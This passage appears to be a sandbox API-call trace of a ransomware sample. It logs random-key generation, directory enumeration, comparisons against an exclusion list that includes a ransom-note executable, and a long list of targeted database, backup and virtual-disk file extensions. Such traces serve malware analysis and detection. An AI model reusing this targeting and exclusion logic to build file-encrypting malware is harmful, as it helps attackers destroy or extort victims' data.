phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0058.053] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0058.053] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0058.053] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0058.053] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0058.053] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0058.053] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0058.053] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0058.053] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0058.053] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0058.054] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0058.054] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0058.054] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0058.054] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0058.054] CloseHandle (hObject=0x154) returned 1 [0058.054] CloseHandle (hObject=0x15c) returned 1 [0058.055] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0058.055] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0058.055] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0058.055] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49cd9c20, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49cd9c20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0058.055] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0058.055] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x642afa0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x921e7f, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x587, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Internet Explorer (64-bit).lnk", cAlternateFileName="INTERN~2.LNK")) returned 1 [0058.055] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0058.055] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="aoldtz.exe") returned 1 [0058.055] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2=".") returned 1 [0058.056] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="..") returned 1 [0058.056] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="windows") returned -1 [0058.056] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="bootmgr") returned 1 [0058.056] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="temp") returned -1 [0058.056] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="pagefile.sys") returned -1 [0058.056] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="boot") returned 1 [0058.056] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="ids.txt") returned 1 [0058.056] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="ntuser.dat") returned -1 [0058.056] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="perflogs") returned -1 [0058.056] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="MSBuild") returned -1 [0058.056] lstrlenW (lpString="Internet Explorer (64-bit).lnk") returned 30 [0058.056] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\desktop.ini") returned 53 [0058.056] lstrcpyW (in: lpString1=0x2cce454, lpString2="Internet Explorer (64-bit).lnk" | out: lpString1="Internet Explorer (64-bit).lnk") returned="Internet Explorer (64-bit).lnk" [0058.056] lstrlenW (lpString="Internet Explorer (64-bit).lnk") returned 30 [0058.056] lstrlenW (lpString="Ares865") returned 7 [0058.056] lstrcmpiW (lpString1="it).lnk", lpString2="Ares865") returned 1 [0058.056] lstrlenW (lpString=".dll") returned 4 [0058.056] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2=".dll") returned 1 [0058.056] lstrlenW (lpString=".lnk") returned 4 [0058.056] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2=".lnk") returned 1 [0058.056] lstrlenW (lpString=".ini") returned 4 [0058.056] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2=".ini") returned 1 [0058.056] lstrlenW (lpString=".sys") returned 4 [0058.056] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2=".sys") returned 1 [0058.056] lstrlenW (lpString="Internet Explorer (64-bit).lnk") returned 30 [0058.056] lstrlenW (lpString="bak") returned 3 [0058.056] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0058.056] lstrlenW (lpString="ba_") returned 3 [0058.056] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0058.056] lstrlenW (lpString="dbb") returned 3 [0058.056] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0058.056] lstrlenW (lpString="vmdk") returned 4 [0058.056] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0058.056] lstrlenW (lpString="rar") returned 3 [0058.056] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0058.056] lstrlenW (lpString="zip") returned 3 [0058.057] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0058.057] lstrlenW (lpString="tgz") returned 3 [0058.057] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0058.057] lstrlenW (lpString="vbox") returned 4 [0058.057] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0058.057] lstrlenW (lpString="vdi") returned 3 [0058.057] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0058.057] lstrlenW (lpString="vhd") returned 3 [0058.057] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0058.057] lstrlenW (lpString="vhdx") returned 4 [0058.057] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0058.057] lstrlenW (lpString="avhd") returned 4 [0058.057] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0058.057] lstrlenW (lpString="db") returned 2 [0058.057] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0058.057] lstrlenW (lpString="db2") returned 3 [0058.057] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0058.057] lstrlenW (lpString="db3") returned 3 [0058.057] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0058.057] lstrlenW (lpString="dbf") returned 3 [0058.057] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0058.057] lstrlenW (lpString="mdf") returned 3 [0058.057] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0058.057] lstrlenW (lpString="mdb") returned 3 [0058.057] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0058.057] lstrlenW (lpString="sql") returned 3 [0058.057] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0058.057] lstrlenW (lpString="sqlite") returned 6 [0058.057] lstrcmpiW (lpString1="t).lnk", lpString2="sqlite") returned 1 [0058.057] lstrlenW (lpString="sqlite3") returned 7 [0058.057] lstrcmpiW (lpString1="it).lnk", lpString2="sqlite3") returned -1 [0058.057] lstrlenW (lpString="sqlitedb") returned 8 [0058.057] lstrcmpiW (lpString1="bit).lnk", lpString2="sqlitedb") returned -1 [0058.057] lstrlenW (lpString="xml") returned 3 [0058.057] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0058.057] lstrlenW (lpString="$er") returned 3 [0058.057] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0058.058] lstrlenW (lpString="4dd") returned 3 [0058.058] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0058.058] lstrlenW (lpString="4dl") returned 3 [0058.058] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0058.058] lstrlenW (lpString="^^^") returned 3 [0058.058] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0058.058] lstrlenW (lpString="abs") returned 3 [0058.058] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0058.058] lstrlenW (lpString="abx") returned 3 [0058.058] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0058.058] lstrlenW (lpString="accdb") returned 5 [0058.058] lstrcmpiW (lpString1=").lnk", lpString2="accdb") returned -1 [0058.058] lstrlenW (lpString="accdc") returned 5 [0058.058] lstrcmpiW (lpString1=").lnk", lpString2="accdc") returned -1 [0058.058] lstrlenW (lpString="accde") returned 5 [0058.058] lstrcmpiW (lpString1=").lnk", lpString2="accde") returned -1 [0058.058] lstrlenW (lpString="accdr") returned 5 [0058.058] lstrcmpiW (lpString1=").lnk", lpString2="accdr") returned -1 [0058.058] lstrlenW (lpString="accdt") returned 5 [0058.058] lstrcmpiW (lpString1=").lnk", lpString2="accdt") returned -1 [0058.058] lstrlenW (lpString="accdw") returned 5 [0058.058] lstrcmpiW (lpString1=").lnk", lpString2="accdw") returned -1 [0058.058] lstrlenW (lpString="accft") returned 5 [0058.058] lstrcmpiW (lpString1=").lnk", lpString2="accft") returned -1 [0058.058] lstrlenW (lpString="adb") returned 3 [0058.058] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0058.058] lstrlenW (lpString="adb") returned 3 [0058.058] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0058.058] lstrlenW (lpString="ade") returned 3 [0058.058] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0058.058] lstrlenW (lpString="adf") returned 3 [0058.058] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0058.058] lstrlenW (lpString="adn") returned 3 [0058.058] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0058.058] lstrlenW (lpString="adp") returned 3 [0058.058] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0058.059] lstrlenW (lpString="alf") returned 3 [0058.059] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0058.059] lstrlenW (lpString="ask") returned 3 [0058.059] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0058.059] lstrlenW (lpString="btr") returned 3 [0058.059] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0058.059] lstrlenW (lpString="cat") returned 3 [0058.059] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0058.059] lstrlenW (lpString="cdb") returned 3 [0058.059] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0058.059] lstrlenW (lpString="ckp") returned 3 [0058.059] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0058.059] lstrlenW (lpString="cma") returned 3 [0058.059] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0058.059] lstrlenW (lpString="cpd") returned 3 [0058.059] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0058.059] lstrlenW (lpString="dacpac") returned 6 [0058.059] lstrcmpiW (lpString1="t).lnk", lpString2="dacpac") returned 1 [0058.059] lstrlenW (lpString="dad") returned 3 [0058.059] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0058.059] lstrlenW (lpString="dadiagrams") returned 10 [0058.059] lstrcmpiW (lpString1="4-bit).lnk", lpString2="dadiagrams") returned -1 [0058.059] lstrlenW (lpString="daschema") returned 8 [0058.059] lstrcmpiW (lpString1="bit).lnk", lpString2="daschema") returned -1 [0058.059] lstrlenW (lpString="db-journal") returned 10 [0058.059] lstrcmpiW (lpString1="4-bit).lnk", lpString2="db-journal") returned -1 [0058.059] lstrlenW (lpString="db-shm") returned 6 [0058.059] lstrcmpiW (lpString1="t).lnk", lpString2="db-shm") returned 1 [0058.059] lstrlenW (lpString="db-wal") returned 6 [0058.059] lstrcmpiW (lpString1="t).lnk", lpString2="db-wal") returned 1 [0058.059] lstrlenW (lpString="dbc") returned 3 [0058.059] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0058.059] lstrlenW (lpString="dbs") returned 3 [0058.059] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0058.059] lstrlenW (lpString="dbt") returned 3 [0058.059] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0058.059] lstrlenW (lpString="dbv") returned 3 [0058.059] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0058.060] lstrlenW (lpString="dbx") returned 3 [0058.060] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0058.060] lstrlenW (lpString="dcb") returned 3 [0058.060] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0058.060] lstrlenW (lpString="dct") returned 3 [0058.060] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0058.060] lstrlenW (lpString="dcx") returned 3 [0058.060] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0058.060] lstrlenW (lpString="ddl") returned 3 [0058.060] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0058.060] lstrlenW (lpString="dlis") returned 4 [0058.060] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0058.060] lstrlenW (lpString="dp1") returned 3 [0058.060] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0058.060] lstrlenW (lpString="dqy") returned 3 [0058.060] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0058.060] lstrlenW (lpString="dsk") returned 3 [0058.060] lstrcmpiW (lpString1="lnk", lpString2="dsk") returned 1 [0058.060] lstrlenW (lpString="dsn") returned 3 [0058.060] lstrcmpiW (lpString1="lnk", lpString2="dsn") returned 1 [0058.060] lstrlenW (lpString="dtsx") returned 4 [0058.060] lstrcmpiW (lpString1=".lnk", lpString2="dtsx") returned -1 [0058.060] lstrlenW (lpString="dxl") returned 3 [0058.060] lstrcmpiW (lpString1="lnk", lpString2="dxl") returned 1 [0058.060] lstrlenW (lpString="eco") returned 3 [0058.060] lstrcmpiW (lpString1="lnk", lpString2="eco") returned 1 [0058.060] lstrlenW (lpString="ecx") returned 3 [0058.060] lstrcmpiW (lpString1="lnk", lpString2="ecx") returned 1 [0058.060] lstrlenW (lpString="edb") returned 3 [0058.060] lstrcmpiW (lpString1="lnk", lpString2="edb") returned 1 [0058.060] lstrlenW (lpString="epim") returned 4 [0058.060] lstrcmpiW (lpString1=".lnk", lpString2="epim") returned -1 [0058.060] lstrlenW (lpString="fcd") returned 3 [0058.060] lstrcmpiW (lpString1="lnk", lpString2="fcd") returned 1 [0058.060] lstrlenW (lpString="fdb") returned 3 [0058.060] lstrcmpiW (lpString1="lnk", lpString2="fdb") returned 1 [0058.060] lstrlenW (lpString="fic") returned 3 [0058.060] lstrcmpiW (lpString1="lnk", lpString2="fic") returned 1 [0058.061] lstrlenW (lpString="flexolibrary") returned 12 [0058.061] lstrcmpiW (lpString1="(64-bit).lnk", lpString2="flexolibrary") returned -1 [0058.061] lstrlenW (lpString="fm5") returned 3 [0058.061] lstrcmpiW (lpString1="lnk", lpString2="fm5") returned 1 [0058.061] lstrlenW (lpString="fmp") returned 3 [0058.061] lstrcmpiW (lpString1="lnk", lpString2="fmp") returned 1 [0058.061] lstrlenW (lpString="fmp12") returned 5 [0058.061] lstrcmpiW (lpString1=").lnk", lpString2="fmp12") returned -1 [0058.061] lstrlenW (lpString="fmpsl") returned 5 [0058.061] lstrcmpiW (lpString1=").lnk", lpString2="fmpsl") returned -1 [0058.061] lstrlenW (lpString="fol") returned 3 [0058.061] lstrcmpiW (lpString1="lnk", lpString2="fol") returned 1 [0058.061] lstrlenW (lpString="fp3") returned 3 [0058.061] lstrcmpiW (lpString1="lnk", lpString2="fp3") returned 1 [0058.061] lstrlenW (lpString="fp4") returned 3 [0058.061] lstrcmpiW (lpString1="lnk", lpString2="fp4") returned 1 [0058.061] lstrlenW (lpString="fp5") returned 3 [0058.061] lstrcmpiW (lpString1="lnk", lpString2="fp5") returned 1 [0058.061] lstrlenW (lpString="fp7") returned 3 [0058.061] lstrcmpiW (lpString1="lnk", lpString2="fp7") returned 1 [0058.061] lstrlenW (lpString="fpt") returned 3 [0058.061] lstrcmpiW (lpString1="lnk", lpString2="fpt") returned 1 [0058.061] lstrlenW (lpString="frm") returned 3 [0058.061] lstrcmpiW (lpString1="lnk", lpString2="frm") returned 1 [0058.061] lstrlenW (lpString="gdb") returned 3 [0058.061] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0058.061] lstrlenW (lpString="gdb") returned 3 [0058.061] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0058.061] lstrlenW (lpString="grdb") returned 4 [0058.061] lstrcmpiW (lpString1=".lnk", lpString2="grdb") returned -1 [0058.061] lstrlenW (lpString="gwi") returned 3 [0058.061] lstrcmpiW (lpString1="lnk", lpString2="gwi") returned 1 [0058.061] lstrlenW (lpString="hdb") returned 3 [0058.061] lstrcmpiW (lpString1="lnk", lpString2="hdb") returned 1 [0058.061] lstrlenW (lpString="his") returned 3 [0058.061] lstrcmpiW (lpString1="lnk", lpString2="his") returned 1 [0058.061] lstrlenW (lpString="ib") returned 2 [0058.062] lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0058.062] lstrlenW (lpString="idb") returned 3 [0058.062] lstrcmpiW (lpString1="lnk", lpString2="idb") returned 1 [0058.062] lstrlenW (lpString="ihx") returned 3 [0058.062] lstrcmpiW (lpString1="lnk", lpString2="ihx") returned 1 [0058.062] lstrlenW (lpString="itdb") returned 4 [0058.062] lstrcmpiW (lpString1=".lnk", lpString2="itdb") returned -1 [0058.062] lstrlenW (lpString="itw") returned 3 [0058.062] lstrcmpiW (lpString1="lnk", lpString2="itw") returned 1 [0058.062] lstrlenW (lpString="jet") returned 3 [0058.062] lstrcmpiW (lpString1="lnk", lpString2="jet") returned 1 [0058.062] lstrlenW (lpString="jtx") returned 3 [0058.062] lstrcmpiW (lpString1="lnk", lpString2="jtx") returned 1 [0058.062] lstrlenW (lpString="kdb") returned 3 [0058.062] lstrcmpiW (lpString1="lnk", lpString2="kdb") returned 1 [0058.062] lstrlenW (lpString="kexi") returned 4 [0058.062] lstrcmpiW (lpString1=".lnk", lpString2="kexi") returned -1 [0058.062] lstrlenW (lpString="kexic") returned 5 [0058.062] lstrcmpiW (lpString1=").lnk", lpString2="kexic") returned -1 [0058.062] lstrlenW (lpString="kexis") returned 5 [0058.062] lstrcmpiW (lpString1=").lnk", lpString2="kexis") returned -1 [0058.062] lstrlenW (lpString="lgc") returned 3 [0058.062] lstrcmpiW (lpString1="lnk", lpString2="lgc") returned 1 [0058.062] lstrlenW (lpString="lwx") returned 3 [0058.062] lstrcmpiW (lpString1="lnk", lpString2="lwx") returned -1 [0058.062] lstrlenW (lpString="maf") returned 3 [0058.062] lstrcmpiW (lpString1="lnk", lpString2="maf") returned -1 [0058.062] lstrlenW (lpString="maq") returned 3 [0058.062] lstrcmpiW (lpString1="lnk", lpString2="maq") returned -1 [0058.062] lstrlenW (lpString="mar") returned 3 [0058.062] lstrcmpiW (lpString1="lnk", lpString2="mar") returned -1 [0058.062] lstrlenW (lpString="marshal") returned 7 [0058.062] lstrcmpiW (lpString1="it).lnk", lpString2="marshal") returned -1 [0058.062] lstrlenW (lpString="mas") returned 3 [0058.062] lstrcmpiW (lpString1="lnk", lpString2="mas") returned -1 [0058.062] lstrlenW (lpString="mav") returned 3 [0058.062] lstrcmpiW (lpString1="lnk", lpString2="mav") returned -1 [0058.062] lstrlenW (lpString="maw") returned 3 [0058.063] lstrcmpiW (lpString1="lnk", lpString2="maw") returned -1 [0058.063] lstrlenW (lpString="mdbhtml") returned 7 [0058.063] lstrcmpiW (lpString1="it).lnk", lpString2="mdbhtml") returned -1 [0058.063] lstrlenW (lpString="mdn") returned 3 [0058.063] lstrcmpiW (lpString1="lnk", lpString2="mdn") returned -1 [0058.063] lstrlenW (lpString="mdt") returned 3 [0058.063] lstrcmpiW (lpString1="lnk", lpString2="mdt") returned -1 [0058.063] lstrlenW (lpString="mfd") returned 3 [0058.063] lstrcmpiW (lpString1="lnk", lpString2="mfd") returned -1 [0058.063] lstrlenW (lpString="mpd") returned 3 [0058.063] lstrcmpiW (lpString1="lnk", lpString2="mpd") returned -1 [0058.063] lstrlenW (lpString="mrg") returned 3 [0058.063] lstrcmpiW (lpString1="lnk", lpString2="mrg") returned -1 [0058.063] lstrlenW (lpString="mud") returned 3 [0058.063] lstrcmpiW (lpString1="lnk", lpString2="mud") returned -1 [0058.063] lstrlenW (lpString="mwb") returned 3 [0058.063] lstrcmpiW (lpString1="lnk", lpString2="mwb") returned -1 [0058.063] lstrlenW (lpString="myd") returned 3 [0058.063] lstrcmpiW (lpString1="lnk", lpString2="myd") returned -1 [0058.063] lstrlenW (lpString="ndf") returned 3 [0058.063] lstrcmpiW (lpString1="lnk", lpString2="ndf") returned -1 [0058.063] lstrlenW (lpString="nnt") returned 3 [0058.063] lstrcmpiW (lpString1="lnk", lpString2="nnt") returned -1 [0058.063] lstrlenW (lpString="nrmlib") returned 6 [0058.063] lstrcmpiW (lpString1="t).lnk", lpString2="nrmlib") returned 1 [0058.063] lstrlenW (lpString="ns2") returned 3 [0058.063] lstrcmpiW (lpString1="lnk", lpString2="ns2") returned -1 [0058.063] lstrlenW (lpString="ns3") returned 3 [0058.063] lstrcmpiW (lpString1="lnk", lpString2="ns3") returned -1 [0058.063] lstrlenW (lpString="ns4") returned 3 [0058.063] lstrcmpiW (lpString1="lnk", lpString2="ns4") returned -1 [0058.063] lstrlenW (lpString="nsf") returned 3 [0058.063] lstrcmpiW (lpString1="lnk", lpString2="nsf") returned -1 [0058.063] lstrlenW (lpString="nv") returned 2 [0058.063] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0058.063] lstrlenW (lpString="nv2") returned 3 [0058.063] lstrcmpiW (lpString1="lnk", lpString2="nv2") returned -1 [0058.063] lstrlenW (lpString="nwdb") returned 4 [0058.064] lstrcmpiW (lpString1=".lnk", lpString2="nwdb") returned -1 [0058.064] lstrlenW (lpString="nyf") returned 3 [0058.064] lstrcmpiW (lpString1="lnk", lpString2="nyf") returned -1 [0058.064] lstrlenW (lpString="odb") returned 3 [0058.064] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0058.064] lstrlenW (lpString="odb") returned 3 [0058.064] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0058.064] lstrlenW (lpString="oqy") returned 3 [0058.064] lstrcmpiW (lpString1="lnk", lpString2="oqy") returned -1 [0058.064] lstrlenW (lpString="ora") returned 3 [0058.064] lstrcmpiW (lpString1="lnk", lpString2="ora") returned -1 [0058.064] lstrlenW (lpString="orx") returned 3 [0058.064] lstrcmpiW (lpString1="lnk", lpString2="orx") returned -1 [0058.064] lstrlenW (lpString="owc") returned 3 [0058.064] lstrcmpiW (lpString1="lnk", lpString2="owc") returned -1 [0058.064] lstrlenW (lpString="p96") returned 3 [0058.064] lstrcmpiW (lpString1="lnk", lpString2="p96") returned -1 [0058.064] lstrlenW (lpString="p97") returned 3 [0058.064] lstrcmpiW (lpString1="lnk", lpString2="p97") returned -1 [0058.064] lstrlenW (lpString="pan") returned 3 [0058.064] lstrcmpiW (lpString1="lnk", lpString2="pan") returned -1 [0058.064] lstrlenW (lpString="pdb") returned 3 [0058.064] lstrcmpiW (lpString1="lnk", lpString2="pdb") returned -1 [0058.064] lstrlenW (lpString="pdm") returned 3 [0058.064] lstrcmpiW (lpString1="lnk", lpString2="pdm") returned -1 [0058.064] lstrlenW (lpString="pnz") returned 3 [0058.064] lstrcmpiW (lpString1="lnk", lpString2="pnz") returned -1 [0058.064] lstrlenW (lpString="qry") returned 3 [0058.064] lstrcmpiW (lpString1="lnk", lpString2="qry") returned -1 [0058.064] lstrlenW (lpString="qvd") returned 3 [0058.064] lstrcmpiW (lpString1="lnk", lpString2="qvd") returned -1 [0058.064] lstrlenW (lpString="rbf") returned 3 [0058.064] lstrcmpiW (lpString1="lnk", lpString2="rbf") returned -1 [0058.064] lstrlenW (lpString="rctd") returned 4 [0058.064] lstrcmpiW (lpString1=".lnk", lpString2="rctd") returned -1 [0058.064] lstrlenW (lpString="rod") returned 3 [0058.064] lstrcmpiW (lpString1="lnk", lpString2="rod") returned -1 [0058.064] lstrlenW (lpString="rodx") returned 4 [0058.065] lstrcmpiW (lpString1=".lnk", lpString2="rodx") returned -1 [0058.065] lstrlenW (lpString="rpd") returned 3 [0058.065] lstrcmpiW (lpString1="lnk", lpString2="rpd") returned -1 [0058.065] lstrlenW (lpString="rsd") returned 3 [0058.065] lstrcmpiW (lpString1="lnk", lpString2="rsd") returned -1 [0058.065] lstrlenW (lpString="sas7bdat") returned 8 [0058.065] lstrcmpiW (lpString1="bit).lnk", lpString2="sas7bdat") returned -1 [0058.065] lstrlenW (lpString="sbf") returned 3 [0058.065] lstrcmpiW (lpString1="lnk", lpString2="sbf") returned -1 [0058.065] lstrlenW (lpString="scx") returned 3 [0058.065] lstrcmpiW (lpString1="lnk", lpString2="scx") returned -1 [0058.065] lstrlenW (lpString="sdb") returned 3 [0058.065] lstrcmpiW (lpString1="lnk", lpString2="sdb") returned -1 [0058.065] lstrlenW (lpString="sdc") returned 3 [0058.065] lstrcmpiW (lpString1="lnk", lpString2="sdc") returned -1 [0058.065] lstrlenW (lpString="sdf") returned 3 [0058.065] lstrcmpiW (lpString1="lnk", lpString2="sdf") returned -1 [0058.065] lstrlenW (lpString="sis") returned 3 [0058.065] lstrcmpiW (lpString1="lnk", lpString2="sis") returned -1 [0058.065] lstrlenW (lpString="spq") returned 3 [0058.065] lstrcmpiW (lpString1="lnk", lpString2="spq") returned -1 [0058.065] lstrlenW (lpString="te") returned 2 [0058.065] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0058.065] lstrlenW (lpString="teacher") returned 7 [0058.065] lstrcmpiW (lpString1="it).lnk", lpString2="teacher") returned -1 [0058.065] lstrlenW (lpString="tmd") returned 3 [0058.065] lstrcmpiW (lpString1="lnk", lpString2="tmd") returned -1 [0058.065] lstrlenW (lpString="tps") returned 3 [0058.065] lstrcmpiW (lpString1="lnk", lpString2="tps") returned -1 [0058.065] lstrlenW (lpString="trc") returned 3 [0058.065] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0058.065] lstrlenW (lpString="trc") returned 3 [0058.065] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0058.065] lstrlenW (lpString="trm") returned 3 [0058.065] lstrcmpiW (lpString1="lnk", lpString2="trm") returned -1 [0058.065] lstrlenW (lpString="udb") returned 3 [0058.065] lstrcmpiW (lpString1="lnk", lpString2="udb") returned -1 [0058.065] lstrlenW (lpString="udl") returned 3 [0058.065] lstrcmpiW (lpString1="lnk", lpString2="udl") returned -1 [0058.066] lstrlenW (lpString="usr") returned 3 [0058.066] lstrcmpiW (lpString1="lnk", lpString2="usr") returned -1 [0058.066] lstrlenW (lpString="v12") returned 3 [0058.066] lstrcmpiW (lpString1="lnk", lpString2="v12") returned -1 [0058.066] lstrlenW (lpString="vis") returned 3 [0058.066] lstrcmpiW (lpString1="lnk", lpString2="vis") returned -1 [0058.066] lstrlenW (lpString="vpd") returned 3 [0058.066] lstrcmpiW (lpString1="lnk", lpString2="vpd") returned -1 [0058.066] lstrlenW (lpString="vvv") returned 3 [0058.066] lstrcmpiW (lpString1="lnk", lpString2="vvv") returned -1 [0058.066] lstrlenW (lpString="wdb") returned 3 [0058.066] lstrcmpiW (lpString1="lnk", lpString2="wdb") returned -1 [0058.066] lstrlenW (lpString="wmdb") returned 4 [0058.066] lstrcmpiW (lpString1=".lnk", lpString2="wmdb") returned -1 [0058.066] lstrlenW (lpString="wrk") returned 3 [0058.066] lstrcmpiW (lpString1="lnk", lpString2="wrk") returned -1 [0058.066] lstrlenW (lpString="xdb") returned 3 [0058.066] lstrcmpiW (lpString1="lnk", lpString2="xdb") returned -1 [0058.066] lstrlenW (lpString="xld") returned 3 